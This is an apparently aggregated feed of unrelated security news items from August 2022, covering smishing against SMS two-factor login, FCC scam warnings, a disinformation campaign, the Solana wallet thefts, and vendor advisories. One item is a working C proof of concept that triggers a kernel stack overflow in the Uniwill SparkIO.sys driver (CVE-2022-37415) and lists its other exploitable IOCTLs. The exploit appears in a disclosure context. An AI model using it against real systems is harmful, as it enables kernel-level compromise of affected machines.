With names, email addresses, and mobile numbers from underground databases, one person in five is at risk of account compromise even with SMS two-factor authentication in place.

Companies that rely on texts for a second factor of authentication are putting about 20% of their customers at risk because the information necessary to attack the system is available in compromised databases for sale on the Dark Web.  

About 1 billion records synthesized from online databases — representing about one in every five mobile phone users in the world — contain users' names, email addresses, passwords, and phone numbers. This gives attackers everything they need to conduct SMS-based phishing attacks, also known as smishing, says Thomas Olofsson, CTO of cybersecurity firm FYEO. 

Cybersecurity experts have long known that the addition of an SMS one-time password is a weak form of two-factor authentication and the simplest form of two-factor authentication for attackers to compromise. However, combining such attacks with the readily available information on users produces a "perfect storm" for attacking accounts, he says.

At Black Hat USA, Olofsson plans to go over findings from research into the problem during a session on Wednesday, Aug. 10, called "Smishmash — Text-Based 2FA Spoofing Using OSINT, Phishing Techniques, and a Burner Phone."

"The research that we have done is two parts: How do you bypass 2FA, and how many phone numbers can we tie to an email address and a password," he tells Dark Reading. "So, for about one in five — a billion — people, we can connect your email address to your phone number, and that is really bad."

The analysis found that by collecting information from known databases of compromised usernames and passwords, researchers could create a database of 22 billion credentials. Linking those credentials to a phone number reduced the exposure to a bit more than 1 billion records, of which about half have been verified.

To make use of those records, attackers can conduct an adversary-in-the-middle attack, where the smishing attack goes to a proxy. When a targeted user opens a link in a malicious SMS message on a mobile device, browsers on iOS and Android rarely show any security information, such as a the URL, since screen real estate is so small. Because of that, few — if any — signs of the attack are presented to the user, making the attacks much more effective, Olofsson says.

In addition, smishing attacks are seven times more likely to succeed than phishing attacks conducted through email, he says.

"It makes it extremely likely that someone will click on the link," Olofsson says. "I even look at our attacks, and I said, wow, I could fall for this."

Attackers have used smishing to compromise financial accounts — especially those linked to cryptocurrency exchanges — during the past two years, with more than $1.6 billion of crypto stolen so far in 2022, according to an analysis published in May. 

**SMS for 2FA: Risky Biz**

Meanwhile, the US federal government has already put additional restrictions on any use of SMS for a second factor of authentication. In 2016, the National Institute of Standards and Technology (NIST) warned against using one-time passwords sent as text messages for a second factor to authenticate users.

"An SMS sent from a mobile phone might seamlessly switch to an internet message delivered to, say, a Skype or Google Voice phone number. Users shouldn't have to know the difference when they hit send — that’s part of the Internet’s magic. But it does matter for security," NIST wrote in an explanation of the policy, adding: "While a password coupled with SMS has a much higher level of protection relative to passwords alone, it doesn't have the strength of device authentication mechanisms inherent in the other authenticators allowable" by NIST guidelines.  

To make it less likely that such attacks succeed, users should ignore any notifications that come through SMS and instead log directly into their account.

"Never trust an SMS message," Olofsson says. "If you feel something is wrong, don't click on it, don't trust it. Go on a computer, and see if you have an e-mail, because at least you can verify the headers then."

Unfortunately, many financial institutions and other companies make it hard for users to implement better security because they only offer SMS as an option for the second factor of authentication. Adding reCAPTCHA checks can give users a hint that something is wrong, Olofsson notes, because any adversary-in-the-middle attack will display the proxy server, not the user's IP address.

Stolen Data Gives Attackers Advantage Against Text-Based 2FA

Smishing attacks, or phishing attempts via SMS, are on the rise, and Americans are fighting off billions of spam messages each month.
The post FCC warns of steep rise in phishing over SMS appeared first on Malwarebytes Labs.

After the FCC (Federal Communications Commission) made a huge splash weeks ago when it told Google and Apple to pull TikTok from their respective app stores, the federal agency is now warning Americans of an increased wave of SMS phishing attacks.

SMS phishing, otherwise known as smishing or robotexts (FCC’s own terminology), is a form of phishing that attempts to trick people into handing over their personally identifiable information (PII) and/or money using SMS instead of email, which standard phishing usually starts. The FCC has noted that scammers use various lures to trick someone into replying, giving out their information, or clicking a link.

“Like robocallers, a robotexter may use fear and anxiety to get you to interact,” the FCC consumer alert reads. “Texts may include false-but-believable claims about unpaid bills, package delivery snafus, bank account problems or law enforcement action against you. They may provide confusing information—as if they were texting someone else—, incomplete information, or utilize other techniques to spur your curiosity and engagement.”

What motivates criminals to engage in smishing tactics is to get money and personal information or to simply confirm that the number they’re messaging is active, so they can target it in future scam campaigns.

According to the FCC, it tracks consumer complaints instead of text volume. The agency noted a steady climb of unwanted SMS messages, from approximately 5,700 in 2019 to 8,500 by June 30, 2022.

A separate study confirmed this, too, but revealed more sobering numbers. RoboKiller, an app that screens scammy calls and messages, found that Americans were sent a mind-blowing 12 billion spam texts in July 2022.

“That’s nearly **_44 spam texts_** for every person in the country!” And the numbers were no different in June and May 2022.

RoboKiller also pointed out in the report that spam texts have outpaced spam calls for two consecutive years. And one of the notable reasons for this is the FCC mandating the STIR (Secure Telephone Identity Revisited) and SHAKEN (Signature-based Handling of Asserted information using toKENs) framework, which was designed to curb spam calls. It’s effective, which is why scammers switched to spam texts.

The FCC posted bite-sized, back-to-back tweets on signs of scam text messages and how Americans can avoid getting scammed.

> How to protect yourself from #scam robotexts:  
> ▪️ Do not respond  
> ▪️ Do not click on any links  
> ▪️ Do not provide any info  
> ▪️ File an FCC complaint  
> ▪️ Forward unwanted texts to SPAM (7726)  
> ▪️ Delete all suspicious texts
> 
> — The FCC (@FCC) July 28, 2022

When you receive a spam text, do not engage with the sender.

Ignore them, but file a complaint to the FCC.

Finally, if you think you were the victim of an SMS text scam, the FCC recommends you report the incident to your local law enforcement agency and notify your bank and mobile carrier.

Stay safe!

FCC warns of steep rise in phishing over SMS

The Uniwill SparkIO.sys driver 1.0 is vulnerable to a stack-based buffer overflow via IOCTL 0x40002008.

/\*

IOCTL 0x40002004 : Arbitrary Physical Memory Read using MmMapIoSpace

IOCTL 0x40002008 : Close a handle of your choice! + Stack-based Buffer Overflow

IOCTL 0x40002000 : Arbitrary RW to IO ports

\*/

#include <Windows.h\>

#include <stdio.h\>

#define GLE( x ) { printf("%s failed with error: %d\\n", x , GetLastError()); }

#define IOCTL\_TRIGGER\_OVERFLOW 0x40002008

typedef struct BufferOverflow {

HANDLE reserved0;

DWORD64 reserved1\[6\];

DWORD64 ROP\_RET\_1;

DWORD64 reserved2\[20\];

} BufferOverflow, \* PBufferOverflow;

DWORD64 genPattern(BYTE b) {

DWORD64 retVal = b;

retVal |= retVal << 8;

retVal |= retVal << 16;

retVal |= retVal << 32;

return retVal;

}

NTSTATUS triggerOverflow(HANDLE hDevice, PBufferOverflow pOverflowData) {

DWORD64 dummy = 0;

DWORD dwBytesReturned = 0;

NTSTATUS status = DeviceIoControl(

hDevice,

IOCTL\_TRIGGER\_OVERFLOW,

pOverflowData,

sizeof(BufferOverflow),

&dummy,

sizeof(dummy),

&dwBytesReturned,

NULL

);

return status;

}

int main() {

BufferOverflow bo = { 0 };

NTSTATUS status = 0;

const char\* strDevName = R"(\\\\.\\SparkIO)";

puts("Opening device");

HANDLE hFile = CreateFileA(strDevName, GENERIC\_READ | GENERIC\_WRITE, FILE\_SHARE\_READ | FILE\_SHARE\_WRITE, NULL, OPEN\_EXISTING, FILE\_ATTRIBUTE\_NORMAL, NULL);

if (hFile == (HANDLE)0 || hFile == INVALID\_HANDLE\_VALUE) {

GLE("CreateFileA");

return -1;

}

puts("Opened handle to device");

puts("Triggering buffer overflow... Press any key to continue...");

getchar();

// set the return address to 0x4141414141414141

bo.ROP\_RET\_1 = genPattern(0x41);

status = triggerOverflow(hFile, &bo);

if (status) {

GLE("Overflow Trigger Failed");

printf("%lx\\n", status);

return status;

}

}

CVE-2022-37415: Uniwill SparkIO.sys PoC

do_request in request.c in muhttpd before 1.1.7 allows remote attackers to read arbitrary files by constructing a URL with a single character before a desired path on the filesystem. This occurs because the code skips over the first character when serving files. Arris NVG443, NVG599, NVG589, and NVG510 devices and Arris-derived BGW210 and BGW320 devices are affected.

CVE-2022-31793: Arris / Arris-variant DSL/Fiber router critical vulnerability exposure

A global network of inauthentic news sites present themselves as independent news outlets, offering content favoring China's government and articles critical of the US.

A fake-news influence campaign based in China is leveraging at least 72 inauthentic news sites to push content strategically aligned with the political interests of the People's Republic of China (PRC) across the globe and in multiple languages.  

The sites are linked to a Chinese public-relations firm called Shanghai Haixun Technology, according to a report from Mandiant, which dubbed the campaign "HaiEnergy." To disseminate the content, the effort makes use of various social-media accounts with hundreds of thousands of followers. 

The purpose of the campaign is to target global audiences with messaging intended to improve the international image of China — and to discredit critics of its policies. According to the new Mandiant report, the campaign narratives include promoting the reform of Hong Kong's electoral system — giving the mainland government more control over choosing candidates — and criticizing the United States and its allies.

At the start of the month, several of the sites published articles critical of US House Speaker Nancy Pelosi's recently concluded trip to Taiwan, warning her to "stay away from Taiwan."

The content also attempts to discredit outspoken government opponents, including German anthropologist Adrian Zenz, who is known for his research on China's autonomous Xinjiang territory in the northwest, where there has been a reported genocide against the Uyghur population.

This was done via website articles and social-media posts, featuring what Mandiant suspects to be "at least three fabricated letters, based on obvious grammatical errors and typos."

One letter was observed being used by a Twitter account belonging to a suspected inauthentic persona "Jonas Drosten" (@Jonas\_drosten), who posted a tweet containing images of three letters. The tweet, and one of the letters, alleges that Adrian received "financial support from US Senator Marco Rubio and former White House Chief Strategist Steve Bannon."  

The Uyghur ethnic minority community has in the past been a target of multiple other disinformation efforts.

**Outsourcing Fake News Efforts**

Mandiant researchers were not able to determine whether Shanghai Haixun Technology is aware of the fakeness of the HaiEnergy effort, but the researchers found evidence that the campaign has leveraged services and infrastructure belonging to the PR firm to host and distribute content.  

The campaign's use of third-party infrastructure allows the operators behind the campaign to obfuscate their identities while distributing content. And the use of a PR firm in this campaign may also be suggestive of recent trends noted by Meta (PDF) regarding the increased outsourcing of influence operations to third parties.

The Mandiant report also notes that actors that use PR firms may also do so to lower the barrier to entry for such activity to actors with limited experience in such areas.

"The campaign does not appear to be particularly sophisticated, as evidenced at least in part by the seeming lack of substantial engagement outside of inauthentic amplification of its content," says Ryan Serabian, senior analyst at Mandiant.  

For instance, some of the social-media accounts outright note that they've been commissioned to promote content, and their bios suggest that they were willing to do "paid promos."

Serabian explains that social-media platforms, governments, and other organizations increasingly look to root out inauthentic information activity, so he expects that actors will adapt new tactics and strategies, like contracting PR firms, to continue to achieve their aims.

"As we've highlighted, such actors might seek to leverage PR firms to distribute content, and they may also become more inventive in the types of content they distribute, such as by way of using technology like artificial intelligence-generated 'deepfake' images and videos," he says.  

This particular operation follows the efforts of Russian operatives, and those allied with Russian interests, which unleashed a deluge of disinformation and fake news to try and sow fear and confusion in Ukraine following the invasion of that nation.

Massive China-Linked Disinformation Campaign Taps PR Firm for Help

Red Hat Security Advisory 2022-5840-01 - The Migration Toolkit for Containers enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Migration Toolkit for Containers (MTC) 1.7.3 security and bug fix update  
Advisory ID:       RHSA-2022:5840-01  
Product:           Red Hat Migration Toolkit  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5840  
Issue date:        2022-08-02  
CVE Names:         CVE-2018-25032 CVE-2018-1000858 CVE-2019-13050  
                   CVE-2019-17594 CVE-2019-17595 CVE-2019-18218  
                   CVE-2019-20838 CVE-2020-14155 CVE-2020-28915  
                   CVE-2020-29361 CVE-2020-29362 CVE-2020-29363  
                   CVE-2021-36084 CVE-2021-36085 CVE-2021-36086  
                   CVE-2021-36087 CVE-2021-40528 CVE-2021-41617  
                   CVE-2022-0778 CVE-2022-1271 CVE-2022-1365  
                   CVE-2022-1621 CVE-2022-1629 CVE-2022-22576  
                   CVE-2022-24407 CVE-2022-24675 CVE-2022-25313  
                   CVE-2022-25314 CVE-2022-27666 CVE-2022-27774  
                   CVE-2022-27776 CVE-2022-27782 CVE-2022-28327  
                   CVE-2022-29526 CVE-2022-29824  
====================================================================  
1. Summary:

The Migration Toolkit for Containers (MTC) 1.7.3 is now available.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

The Migration Toolkit for Containers (MTC) enables you to migrate  
Kubernetes resources, persistent volume data, and internal container images  
between OpenShift Container Platform clusters, using the MTC web console or  
the Kubernetes API.

Security Fix(es):

* cross-fetch: Exposure of Private Personal Information to an Unauthorized  
Actor (CVE-2022-1365)

* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)

* golang: crypto/elliptic: panic caused by oversized scalar  
(CVE-2022-28327)

* golang: syscall: faccessat checks wrong group (CVE-2022-29526)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Velero and Restic are using incorrect SCCs [OADP-BL] (BZ#2082216)

* [MTC] Migrations gets stuck at StageBackup stage for indirect runs  
[OADP-BL] (BZ#2091965)

* MTC: 1.7.1 on OCP 4.6: UI is stuck in "Discovering persistent volumes  
attached to source projects" step (BZ#2099856)

* Correct DNS validation for destination namespace (BZ#2102231)

* Deselecting all pvcs from UI still results in an attempted PVC transfer  
(BZ#2106073)

3. Solution:

For details on how to install and use MTC, refer to:

https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2076133 - CVE-2022-1365 cross-fetch: Exposure of Private Personal Information to an Unauthorized Actor  
2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode  
2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar  
2082216 - Velero and Restic are using incorrect SCCs [OADP-BL]  
2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group  
2091965 - [MTC] Migrations gets stuck at StageBackup stage for indirect runs [OADP-BL]  
2099856 - MTC: 1.7.1 on OCP 4.6: UI is stuck in "Discovering persistent volumes attached to source projects" step  
2102231 - Correct DNS validation for destination namespace  
2106073 - Deselecting all pvcs from UI still results in an attempted PVC transfer

5. JIRA issues fixed (https://issues.jboss.org/):

MIG-1155 - Update to newer ansible runner image for hooks  
MIG-1242 - Must set upper bound on OADP dep to prevent jump to 1.1  
MIG-1254 - Investigate impact of deprecated Docker V2 Schema 1 for MTC on OCP3.11

6. References:

https://access.redhat.com/security/cve/CVE-2018-25032  
https://access.redhat.com/security/cve/CVE-2018-1000858  
https://access.redhat.com/security/cve/CVE-2019-13050  
https://access.redhat.com/security/cve/CVE-2019-17594  
https://access.redhat.com/security/cve/CVE-2019-17595  
https://access.redhat.com/security/cve/CVE-2019-18218  
https://access.redhat.com/security/cve/CVE-2019-20838  
https://access.redhat.com/security/cve/CVE-2020-14155  
https://access.redhat.com/security/cve/CVE-2020-28915  
https://access.redhat.com/security/cve/CVE-2020-29361  
https://access.redhat.com/security/cve/CVE-2020-29362  
https://access.redhat.com/security/cve/CVE-2020-29363  
https://access.redhat.com/security/cve/CVE-2021-36084  
https://access.redhat.com/security/cve/CVE-2021-36085  
https://access.redhat.com/security/cve/CVE-2021-36086  
https://access.redhat.com/security/cve/CVE-2021-36087  
https://access.redhat.com/security/cve/CVE-2021-40528  
https://access.redhat.com/security/cve/CVE-2021-41617  
https://access.redhat.com/security/cve/CVE-2022-0778  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-1365  
https://access.redhat.com/security/cve/CVE-2022-1621  
https://access.redhat.com/security/cve/CVE-2022-1629  
https://access.redhat.com/security/cve/CVE-2022-22576  
https://access.redhat.com/security/cve/CVE-2022-24407  
https://access.redhat.com/security/cve/CVE-2022-24675  
https://access.redhat.com/security/cve/CVE-2022-25313  
https://access.redhat.com/security/cve/CVE-2022-25314  
https://access.redhat.com/security/cve/CVE-2022-27666  
https://access.redhat.com/security/cve/CVE-2022-27774  
https://access.redhat.com/security/cve/CVE-2022-27776  
https://access.redhat.com/security/cve/CVE-2022-27782  
https://access.redhat.com/security/cve/CVE-2022-28327  
https://access.redhat.com/security/cve/CVE-2022-29526  
https://access.redhat.com/security/cve/CVE-2022-29824  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYuqtatzjgjWX9erEAQj0Cw/+Px30wY+lU4kEvevERJjBt6yHGvQnfqOr  
VPKv+1ikwiA/x95m8fHGNrT6iqahLIbmyRPnZUvUbsSH0TD/vsDYyI/RmPuxpqaE  
d5UjsnkjK4/+9nVSKWiiqpmq3fnmICvIlOYadpj3f6SuNiWGLhKivKLPdxgb9MU/  
eWl7XN7RiFenuSWo1znYlk+WgEXSE3ltfQ6AZ3G4/H2D440AQfbDDWel+361Ng9F  
LSrmi3G1bfrw1Ur3mA44QEr2BUVmZgAXvFiIWNXn6xeyfEQegNDrgFaELcY26RHy  
1KpcLme8jDn5hCZIuApkOnfeBC8M1xibqhDHWaQHHXflpIdJAYDD4ZrFpK/ka0NO  
WGqgBpktNGgIa1rhiOS7WkFPN/TLkgfikl38kw3Y/s8OgkLMt8QUQPm1Q4GyYeX+  
3HBS67gX0hP6QVIeEQx3mQBgxP97LH1dEiisNp6/YZd6XpGRrGZU+3cgiXa2G4tc  
irw7dDpJDWHqkLi9iTKcjRQpsghJqFL7qcZDxQPZYTD5peePPz7TSGoLzy0Ew8RO  
44bf2FoxGd0LmA0WdCczLOhYA2K1/Il13kMEjWiqN76WvRZ5b5JUpTiyuKHYhOLn  
rgbr4bVfkkfJFJfw/Gftrhz0xnIyYAE8ql6HULJzGwvS3VtZKw+IsSL6VRh6axsA  
NhP6/InC1K0=W1QN  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5840-01

Red Hat Security Advisory 2022-5821-01 - Kernel-based Virtual Machine offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems. Issues addressed include buffer overflow, integer overflow, and memory leak vulnerabilities.

Red Hat Security Advisory 2022-5821-01

Copado's Kyle Tobener will discuss a three-pronged plan at Black Hat USA for addressing human weaknesses in cybersecurity with this medical concept — from phishing to shadow IT.

It's a well-known fact that humans are — and will remain — one of the weakest links in any company's cyber defenses. Security admins have tried to help the situation through random phishing tests and training, ultimatums, eliminating local control over a given device, and even naming and shaming those unlucky souls who clicked on the wrong link in an email.

Results have been middling at best, as shown by the finding in Verizon's "2022 Data Breach Investigations Report" (DBIR) that the vast majority of breaches start with phishing and social engineering.

Kyle Tobener, vice president and head of security and IT at Copado, says that it doesn't have to be that way. Instead, businesses can take a page from the medical community and find a much more effective approach through the principle of harm reduction. That essentially means adopting a focus on minimizing or mitigating bad outcomes from bad behavior rather than attempting to eliminate bad behavior completely.

**How Harm Reduction Applies to Cybersecurity**

In a session next week at Black Hat USA entitled "Harm Reduction: A Framework for Effective & Compassionate Security Guidance," Tobener plans to discuss this fresh way of thinking about user behavior, education, and awareness when it comes to cyber threats.

"Harm reduction is a big topic in the healthcare space, but it hasn't really made its way into information security all that much," he tells Dark Reading, adding that as a cancer survivor and brother of someone who wrestled with substance addiction, he learned about harm reduction firsthand.

"Unfortunately, what we see is still mostly abstinence-based guidance in a lot of scenarios by security people," he says.

To illustrate the contrast between the two approaches, he uses the example of the attention-grabbing Super Bowl ad back in February from Coinbase, which featured a QR code bouncing around the screen, Pong-like.

"If you went to Twitter right after that, there were thousands of security people saying that you should never use a QR code if you don't know where that QR code's from," he says. "That guidance is not effective whatsoever. I'm sure millions of people have used a QR code, and if your focus is giving guidance that isn't practical or pragmatic, that people aren't going to follow, then it's going to be very ineffective and you're wasting an opportunity to educate those people in a way that's actually useful."

In a harm-reduction approach, the answer would have been to assume that people were going to click on such an intriguing item (and indeed, QR codes are so widespread in their use in general that asking people to never use them is a simple non-starter), and build a defensive strategy with that in mind.

"Educate them on what to look for once they do something like use a QR code," Tobener explains. "How do you know that the website you went to is a safe one? If you only tell people not to do something, and then they do it and they go to the website, and they're not prepared to look for red flags, they're going to be worse off than they would be."

**How to Deploy Harm Reduction**

In his Black Hat talk, Tobener plans to address the implementation of harm reduction in a cybersecurity context with a three-pronged approach, starting with fomenting acceptance that risk-taking behaviors are here to stay.

"I think this is a very pragmatic approach that a lot of security people aren't willing to take; they come with a mindset that risk can be eradicated, which is just not realistic," he notes. "Just like the war on drugs was not effective, Prohibition was not effective, and D.A.R.E. programs and 'scared straight' were actually shown to be more harmful than helpful in kids."

After gaining buy-in from security teams and powers that be on the impossibility of preventing risky actions, the next step is prioritizing the reduction of the negative consequences of those risky behaviors, and understanding which battles to fight when it comes to corporate security policies.

"For example, in an enterprise context, you might have an enterprise password manager that everyone is supposed to use," Tobener explains. "But there will be people who don't want to use the corporate-provided password manager because they're not familiar with it, and they want to use their own. Instead of making them stop what they're doing, consider whether using their own password manager is better than not using a password manager at all. In other words, are there bigger fish to fry?"

The third prong that he plans to cover in this Black Hat USA session is that of compassion.

"The final piece of the framework is kind of a weird one for cybersecurity, but it's really important in the harm reduction space: Embracing compassion while providing guidance," he says. "This one is probably the hardest concept for security people and even healthcare people to wrap their heads around, which is the idea of improving people's situations by being compassionate and supportive, even if you're supporting them in doing what you consider to be the wrong thing."

Just like social stigma makes people avoid drug treatment rather than accept it, the harsh attitude and conflict-fraught approach coming from some cybersecurity teams toward users is going to make people less likely to want to do the right thing, he explains. For instance, in the above shadow-IT password manager example, teams could send threatening emails to offenders or even get line managers involved; or, they could work out a compromise, offer ease-of-use training, and generally take a "we're with you not against you" tack when discussing the issue.

"By being supportive and compassionate, you show them that you accept them despite what they're doing, and that even though it's not perfect now, they have a chance to improve in the future," Tobener says. "Oftentimes, when you are compassionate with people, they will then educate themselves. And make better choices in the long run."

The session will look to give attendees practicable takeaways about becoming a more effective security practitione when it comes to managing users who aren't listening to you.

"I get really tired of seeing on Twitter people telling people 'do this or you deserve the consequences,'" Tobener says. "I'm trying to raise the security consciousness to a place where we stop telling people not to do things, and instead say, OK, you shouldn't do this, but if you do, here's how to do it more safely."

How IT Teams Can Use 'Harm Reduction' for Better Cybersecurity Outcomes

By Waqas
An unknown hacker targeted the Solana ecosystem on Wednesday and drained approx. $5 million worth of SOL and…
This is a post from HackRead.com Read the original post: 8,000 Solana Wallets Drained Millions Worth of Crypto in Cyberattack

****An unknown hacker targeted the Solana ecosystem on Wednesday and drained approx. $5 million worth of SOL and other tokens.****

The Solana blockchain has become the target of a cyberattack late Tuesday night, during which thousands of its wallets were drained of $4 to $5 million worth of Solana and USDC.

The attack originated from the Solana browser wallet Phantom. Research revealed that the hacker compromised user keys, or **seedphrases**, which were then re-used on different chains. Solana’s representative Austin Federa confirmed that hardware wallets were safe.

For your information, Solana is Ethereum blockchain’s rival cryptocurrency ecosystem and has suffered network outages and security-related issues **previously**. However, although unconfirmed, there are also rumors that it could be an iOS-based supply chain attack.

> Seems like an iOS supply chain attack. Multiple plausible wallets that only received sol and had no interactions beyond receiving have been affected. https://t.co/ne0g3ZmLH5
> 
> As well as key that were imported into iOS, and generated externally.https://t.co/hStAr1mU6Q
> 
> — SMS T◎ly, 🇺🇸 (@aeyakovenko) August 3, 2022

It is worth noting that **in April 2022**, MetaMask warned Apple users to disable automatic iCloud backup of their wallet data. The warning resulted from the losses sustained by an NFT collector who reportedly lost $650,000 worth of digital assets after their MetaMask wallet was wiped out within seconds.

**Damages Caused by the Attack**

The damages vary as more than $5.2 million worth of crypto assets were stolen from over 5,000 wallets, explained blockchain forensics firm Elliptic. The company’s co-founder Tom Robinson said that the root cause of the attack isn’t yet clear, but from whatever is known, it appears to be caused by a “flaw in certain wallet software rather than in the Solana blockchain itself.”

Solna Status, a Twitter account run by Solana Foundation later confirmed that 8,000 wallets were targeted. The targeted currencies include SOL, SL, and several other Solana-based tokens from the Slope and Phantom digital wallets.

Blockchain audit firm OtterSec **shared** that the transactions were signed by the wallets’ owners, meaning private keys must have been compromised.

The Solana attack has irked the investor community as lately there has been an unprecedented surge in cybercrimes targeting crypto exchanges and wallets. Several of Solana’s traders took to Twitter to express disappointment, calling for a short position in the cryptocurrency.

A short position is initiated by a trader by selling a borrowed security or its futures contract/derivative to buy it back when the price is lower. After the attack, Solana’s SOL token plunged 7.3% and traded at $38.40 on Wednesday, marking its lowest this week.

> 🚨 Widespread Solana private key compromise 🚨
> 
> – attacker is stealing both native tokens (SOL) and SPL tokens (USDC)  
> – affecting wallets that have been inactive for >6 months  
> – both Phantom & Slope wallets reportedly drained pic.twitter.com/AkZXOGLD0Q
> 
> — foobar (@0xfoobar) August 3, 2022

1.  **$625m Stolen From The Blockchain Behind Axie Infinity Game**
2.  **Multichain hack: Hacker returns $1 million, keeps $150k as bug bounty**
3.  **NFT Marketplace OpenSea Suffers Data Breach- Users’ Email IDs Leaked**
4.  **Hackers Exploit Harmony’s Horizon Blockchain Bridge to Steal $100 Million**
5.  **LAZARUS APT Using TraderTraitor Malware to Target Blockchain Orgs, Users**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

8,000 Solana Wallets Drained Millions Worth of Crypto in Cyberattack

An improper access control vulnerability [CWE-284] in FortiOS versions 6.2.0 through 6.2.11, 6.4.0 through 6.4.8 and 7.0.0 through 7.0.5 may allow an authenticated attacker with a restricted user profile to gather the checksum information about the other VDOMs via CLI commands.

** PSIRT Advisories**

**FortiOS -- Inter-VDOM information leaking**

**Summary**

An improper access control vulnerability \[CWE-284\] in FortiOS may allow an authenticated attacker with a restricted user profile to gather the checksum information about the other VDOMs via CLI commands.

**Affected Products**

FortiOS version 7.0.0 through 7.0.5  
FortiOS version 6.4.0 through 6.4.8  
FortiOS version 6.2.0 through 6.2.11

**Solutions**

Please upgrade to FortiGate version 7.2.0 or above.  
Please upgrade to FortiGate version 7.0.6 or above.  
Please upgrade to FortiGate version 6.4.9 or above.

Tag

#ios